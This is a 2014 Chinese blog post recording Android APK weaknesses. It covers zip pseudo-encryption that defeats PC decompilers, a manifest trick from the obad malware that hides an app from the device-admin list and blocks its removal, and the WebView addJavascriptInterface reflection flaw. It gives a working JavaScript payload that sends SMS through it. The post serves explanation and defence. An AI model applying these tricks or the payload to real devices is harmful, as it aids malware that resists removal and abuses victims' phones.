文档章节

apk漏洞记录1:伪加密+设备管理器不可删+webview漏洞

科技创造
 科技创造
发布于 2014/09/04 10:53
字数 769
阅读 226
收藏 4

伪加密1:apk打开需要密码

成因:修改zip的头,把文件的加密标志设置为ture,还原就把加密标志设置为false.利用了Android处理zip文件不判断头里的加密信息,其他压缩软件,java默认实现的zip api都有检测zip头中的加密信息 


伪加密2:apk压缩文件被破坏

成因:APKPC上面可以看作一个压缩文件,在Android系统里面它就是一个手机系统软件文件。Android系统对APK的识别是从标志头到标志尾,其他多余数据都会无视。所以说在标志尾添加其他数据对把APK看做压缩文件的PC端来说这个文件被破坏了,所以你要对其进行解压或者查看都会提示文件已损坏,用反编译工具也会提示文件已损坏,但是它却不会影响在Android系统里面的正常运行和安装而且也能兼容到所有系统。使用压缩文件修复工具也能把它修复好让我们做的保护消失。



设备管理器不可删除:某app申请到了设备管理器权限后,在设备管理列表隐身,并且不可被卸载,如obad

成因:

<receiver android:name="LockListener"
            android:permission="android.permission.BIND_DEVICE_ADMIN">  
            <meta-data android:name="android.app.device_admin"
                      android:resource="@xml/lock_screen" />
        <intent-filter>  
               <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"  />
        </intent-filter>  
       
        </receiver> 

如果去掉上面的<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"  /> ,android还是允许app注册成为设备管理器,但是此app会在设备管理列表隐身,且不可被取消设备管理器权限。


webview漏洞:  Android系统通过WebView.addJavascriptInterface方法注册可供javascript调用的java对象,以用于增强javascript的功能。但是系统并没有对注册JAVA类的方法调用的限制。导致攻击者可以利用反射机制调用未注册的其它任何JAVA类,最终导致javascript能力的无限增强。

举例:

我们利用该漏洞调用SmsManager发送短信(被攻击APK要有短信发送权限)

         WebView webview = new WebView(context);

         WebSettings webset= webview.getSettings();
         webset.setJavaScriptEnabled(true);
         webview.addJavascriptInterface(new JSInvoke(), "jsinvoke");

         利用该漏洞的外部javascript脚本:

         <script>

               var obj_smsManager = jsinvoke.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null).invoke(null,null);

               obj_smsManager.sendTextMessage("159********",null,"test",null,null);

         </script>


    出于安全考虑,为了防止Java层的函数被随便调用,Google在4.2版本之后,规定允许被调用的函数必须以@JavascriptInterface进行注解,所以如果某应用依赖的API Level为17或者以上,就不会受该问题的影响(注:Android 4.2中API Level小于17的应用也会受影响)。


© 著作权归作者所有

科技创造
粉丝 37
博文 199
码字总数 174505
作品 0
徐汇
程序员
私信 提问
obad病毒整理汇总(最复杂精致的android病毒)

起源 该样本起源于一篇卡巴斯基实验室的报告1,被誉为最复杂精致的android病毒。 特点 1、AndroidManifest使用非常规方法构造。 左为obad的AndroidManifest,右为普通的AndroidMainifest。 ...

VinceXie
2013/12/05
675
0
五大APP安全在线检测平台对比

Android APP检测之自动化检测实战:五大APP安全在线检测平台对比 - FreeBuf.COM Android APP本文作者:ice@DMZLab 最近一直在研究的检测,写了一个系列的文章——手工检测,自动化检测,常见...

Ho0oH
2017/10/31
0
0
Android APP检测之自动化检测实战:五大APP安全在线检测平台对比

Android APP本文作者:ice@DMZLab 最近一直在研究的检测,写了一个系列的文章——手工检测,自动化检测,常见漏洞分析。今天给大家带来的是自动化检测。本篇没有深入的讲解每一个漏洞的详情,...

亭子happy
2018/06/13
277
0
关于android设备管理器的一些分析

作 者: limitemp 时 间: 2014-01-12,20:43:04 链 接: http://bbs.pediy.com/showthread.php?t=183692 想必很多人都知道轰动一时android木马OBAD,该木马利用android设备管理器的漏洞,当用户...

中成才
2015/08/20
202
0
避免踩坑:易盾安全老司机起底Android九大漏洞,附解决建议

Android应用会遇到各种各样的漏洞,如何从细节上了解各种安全隐患,积极采取适当的防御措施便变得尤为重要。为了让大家对Android漏洞有一个非常全面的认识,网易云易盾资深安全工程师徐从祥为...

网易云易盾
2018/05/16
0
0

没有更多内容

加载失败,请刷新页面

加载更多

PostgreSQL 11.3 locking

rudi
今天
5
0
Mybatis Plus sql注入器

一、继承AbstractMethod /** * @author beth * @data 2019-10-23 20:39 */public class DeleteAllMethod extends AbstractMethod { @Override public MappedStatement injectMap......

一个yuanbeth
今天
10
1
一次写shell脚本的经历记录——特殊字符惹的祸

本文首发于微信公众号“我的小碗汤”,扫码文末二维码即可关注,欢迎一起交流! redis在容器化的过程中,涉及到纵向扩pod实例cpu、内存以及redis实例的maxmemory值,statefulset管理的pod需要...

码农实战
今天
4
0
为什么阿里巴巴Java开发手册中不建议在循环体中使用+进行字符串拼接?

之前在阅读《阿里巴巴Java开发手册》时,发现有一条是关于循环体中字符串拼接的建议,具体内容如下: 那么我们首先来用例子来看看在循环体中用 + 或者用 StringBuilder 进行字符串拼接的效率...

武培轩
今天
8
0
队列-链式(c/c++实现)

队列是在线性表功能稍作修改形成的,在生活中排队是不能插队的吧,先排队先得到对待,慢来得排在最后面,这样来就形成了”先进先出“的队列。作用就是通过伟大的程序员来实现算法解决现实生活...

白客C
今天
81
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部